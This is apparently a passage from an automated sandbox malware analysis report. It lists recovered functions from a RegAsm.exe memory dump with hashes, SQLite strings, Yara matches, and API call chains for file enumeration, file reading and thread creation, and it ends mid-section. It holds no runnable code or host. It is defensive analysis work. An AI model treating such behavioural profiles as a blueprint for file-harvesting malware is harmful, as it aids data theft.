                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 82d7b3752d54328d53c7d33183843799bdd5639bd16ee0919a8f61b6d81503b8
                                                                                                                                                                                                                                                              • Instruction ID: 1dc66dd6e7175522310cf5b3952b21faeb145ae76c8709a94f2fa4e5158273ac
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82d7b3752d54328d53c7d33183843799bdd5639bd16ee0919a8f61b6d81503b8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF81DF76614305AFD710DF68CC80B2BB3E9EFC4718F48082DF9859B350E676E9458B96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: YHI;
                                                                                                                                                                                                                                                              • API String ID: 0-2037931556
                                                                                                                                                                                                                                                              • Opcode ID: 93f81b3cf7c8747a55b9647336b4a5616545b3b81ad14a6349da893077f0ebfa
                                                                                                                                                                                                                                                              • Instruction ID: 9f17d63907855cc7a60c56efb32eab6ab868cbf487c078f93fe7f5e43a96e0d0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93f81b3cf7c8747a55b9647336b4a5616545b3b81ad14a6349da893077f0ebfa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DF1DFB05003429FD3119F69C894A2BB7FCEF81715F0D452CEDA8C6281E775E95ACBA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: e
                                                                                                                                                                                                                                                              • API String ID: 0-4024072794
                                                                                                                                                                                                                                                              • Opcode ID: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                                                                                                                                                                                                                              • Instruction ID: b1a0d6e1a9d666b7f6abd8596f1965fc4f4ed3acd8c7cffb23e3e76b9cbc3338
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C5126766082419FEB04CF28DC80A67BBE5FF95311F1845AEF886C6591E731F858C7A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %lld %lld
                                                                                                                                                                                                                                                              • API String ID: 0-3794783949
                                                                                                                                                                                                                                                              • Opcode ID: 7c3d56af4a68180cb52267c2259d888d2210e2aa9a9889fb0c684a4c5b50e315
                                                                                                                                                                                                                                                              • Instruction ID: d204ca50db06b64b53695102591cbe155cbed2e4215a957669f0f2e003d05609
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c3d56af4a68180cb52267c2259d888d2210e2aa9a9889fb0c684a4c5b50e315
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE31F5792042007FE7115B28CC45F6B7BAEEFC1710F58841CFA45962D2E772E912C7A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 199415A2
                                                                                                                                                                                                                                                              • API called with finalized prepared statement, xrefs: 19941586
                                                                                                                                                                                                                                                              • misuse, xrefs: 199415AC
                                                                                                                                                                                                                                                              • API called with NULL prepared statement, xrefs: 19941571
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 199415B1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-860711957
                                                                                                                                                                                                                                                              • Opcode ID: c6335cccec1b92a25c72b4a4fb64f1623a58c8cc76b4d3c8a15fb6c62887a2d1
                                                                                                                                                                                                                                                              • Instruction ID: 96fada86c6be6c90a74a7ffc5761172cc48f7f0b60a12f6a535cc62d2ad1a0f6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6335cccec1b92a25c72b4a4fb64f1623a58c8cc76b4d3c8a15fb6c62887a2d1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83C1C1F4B007419BE7338F28D945B5777ECBB60354F2C452CE88A8B282E776E4598792
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1994D5DD
                                                                                                                                                                                                                                                              • API called with finalized prepared statement, xrefs: 1994D5C1
                                                                                                                                                                                                                                                              • misuse, xrefs: 1994D5E7
                                                                                                                                                                                                                                                              • API called with NULL prepared statement, xrefs: 1994D5AC
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 1994D5EC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-860711957
                                                                                                                                                                                                                                                              • Opcode ID: 42b407a599f3dfa768687fc3a265225416395ade8129fc4ea6a70dab83f737ef
                                                                                                                                                                                                                                                              • Instruction ID: 3fc29a011e0c820b81d8edc5043820dbe82d9fee1c64beb9c0f8566cfe817842
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42b407a599f3dfa768687fc3a265225416395ade8129fc4ea6a70dab83f737ef
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80B1E2B89047419FE3128F28C945B5777E8BF45308F28852CE8D98B381E776F459CBA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 004093C6
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00423DD4,?,?,00423BD2,00000000), ref: 00409443
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00423DD8), ref: 00409460
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00423DDC), ref: 0040947A
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00423DE0,?,?,00423BD3), ref: 00409511
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 00409592
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 004086DA: _EH_prolog.MSVCRT ref: 004086DF
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040977B
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040978A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2015904956-0
                                                                                                                                                                                                                                                              • Opcode ID: aeb0717eeb547d0dca04c4836053a964822107278d7c0ca16cbdc1c9b2076cab
                                                                                                                                                                                                                                                              • Instruction ID: 2928ef73ce396786150c9efe5f3babeae40c82e37941feca583e6cf38b7478b9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aeb0717eeb547d0dca04c4836053a964822107278d7c0ca16cbdc1c9b2076cab
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEC17371901248EACF10EBB6D946BDD7FB8AF05304F54446EE845B32C2DB785B18CBA6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 004097E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00423BD6,75B0AC90), ref: 0040983F
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00423DEC), ref: 0040985C
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00423DF0), ref: 00409876
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00409D97
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00409DA6
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                              • String ID: $\*.*
                                                                                                                                                                                                                                                              • API String ID: 1275501236-3868368519
                                                                                                                                                                                                                                                              • Opcode ID: 154ce69cdb7ab854ade205a18d18913b38e9bc629dc3cc948b8a58f007115d9d
                                                                                                                                                                                                                                                              • Instruction ID: 59ffe572b51746dec3494985b69b5421d0e14d4bfb075f3e6b9f57112aa3d079
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 154ce69cdb7ab854ade205a18d18913b38e9bc629dc3cc948b8a58f007115d9d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8025F7180024CEADF05EBA2C956BDEBB78AF14308F1444AEE505732C2DF782B59DB65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: aaf8f9c7eebee5ee5f75ebbf438699867cb97553ad5128541d6f8279882d6b9a
                                                                                                                                                                                                                                                              • Instruction ID: cb2c486ac5e8d76fd89c29413f471b281f2ca39abca510521ca6eabfea53ad9d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaf8f9c7eebee5ee5f75ebbf438699867cb97553ad5128541d6f8279882d6b9a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0C17776E183455FF7108A2CCC82BDB77D1EFA2320F9C052FE4958729AE225E545C7A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
